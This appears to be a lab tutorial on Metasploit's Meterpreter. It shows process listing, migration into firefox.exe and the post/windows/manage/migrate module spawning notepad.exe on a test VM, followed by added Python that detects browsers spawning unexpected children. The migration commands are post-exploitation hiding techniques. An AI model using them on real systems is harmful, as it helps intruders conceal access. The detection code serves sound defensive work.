[MAD-METASPLOIT] 0x31 - Migrate & Hiding process
Process Migrate
meterpreter > ps
Process List
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0
252 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
264 472 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
324 2716 firefox.exe x86 1 HAHWUL\Test-Virtualbox C:\Program Files\Mozilla Firefox\firefox.exe
328 320 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
376 320 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
384 368 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
412 368 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
472 376 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
480 376 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
488 376 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
608 472 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
668 472 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\VBoxService.exe
676 4416 QQPCNetFlow.exe x86 1 HAHWUL\Test-Virtualbox C:\Program Files\Tencent
...snip...
7884 608 Tencentdl.exe x86 1 HAHWUL\Test-Virtualbox C:\program files\common files\tencent\qqdownload\130\tencentdl.exe
8064 472 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
meterpreter > migrate 324
[*] Migrating from 5908 to 324...
[*] Migration completed successfully.
Migrate using the post module
meterpreter > run post/windows/manage/migrate
[*] Running module against HAHWUL
[*] Current server process: firefox.exe (324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 7428
[+] Successfully migrated to process 7428
meterpreter > ps
...snip...
7428 324 notepad.exe x86 1 HAHWUL\Test-Virtualbox C:\Windows\system32\notepad.exe
...snip...
meterpreter > sysinfo
Computer        : HAHWUL
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: HAHWUL\Test-Virtualbox
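Seen from the defender's side, the listing after the post module shows the trace migration leaves behind: a notepad.exe (7428) whose parent is the browser firefox.exe (324). As an added example, not code from the original post, the Python below parses `ps`-style output into parent/child pairs and flags a browser that spawned a non-browser process; the sample listing, the browser set and the helper allowlist are constructed assumptions.

```python
import re

# Constructed sample modelled on the `ps` listing above (not captured output);
# the notepad.exe child of firefox.exe is the trace post/windows/manage/migrate
# leaves behind.
SAMPLE_PS = r"""
PID   PPID  Name              Arch  Session  User                          Path
---   ----  ----              ----  -------  ----                          ----
0     0     [System Process]
4     0     System            x86   0
252   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
324   2716  firefox.exe       x86   1        HAHWUL\Test-Virtualbox        C:\Program Files\Mozilla Firefox\firefox.exe
472   376   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
7428  324   notepad.exe       x86   1        HAHWUL\Test-Virtualbox        C:\Windows\system32\notepad.exe
8064  472   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
"""

# One `ps` row. Name may contain spaces ([System Process]) and so may User and
# Path, so Path is anchored on a drive letter or a leading backslash.
ROW_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S.*?)"
    r"(?:\s+(?P<arch>x86|x64)\s+(?P<session>\d+)"
    r"(?:\s+(?P<user>.+?)\s+(?P<path>(?:[A-Za-z]:\\|\\)\S.*))?)?\s*$"
)

def parse_ps(text):
    """Parse `ps` output into {pid: {ppid, name, arch, session, user, path}}."""
    procs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:  # header, separator and blank lines
            continue
        row = m.groupdict()
        pid, ppid = int(row.pop("pid")), int(row.pop("ppid"))
        procs[pid] = {"ppid": ppid, **row}
    return procs

# Assumption behind the check: a browser spawns only itself or its own helpers;
# any other child (here notepad.exe) is worth a second look.
BROWSERS = {"firefox.exe", "chrome.exe", "iexplore.exe"}
HELPERS = {"plugin-container.exe"}

def unexpected_browser_children(procs):
    """Return (pid, name, ppid, parent_name) for non-browser children of browsers."""
    hits = []
    for pid, p in procs.items():
        parent = procs.get(p["ppid"])
        if parent and parent["name"] in BROWSERS and p["name"] not in BROWSERS | HELPERS:
            hits.append((pid, p["name"], p["ppid"], parent["name"]))
    return sorted(hits)
```

Running `unexpected_browser_children(parse_ps(SAMPLE_PS))` on the sample returns the single pair notepad.exe (7428) under firefox.exe (324), the same relationship visible in the `ps` output above.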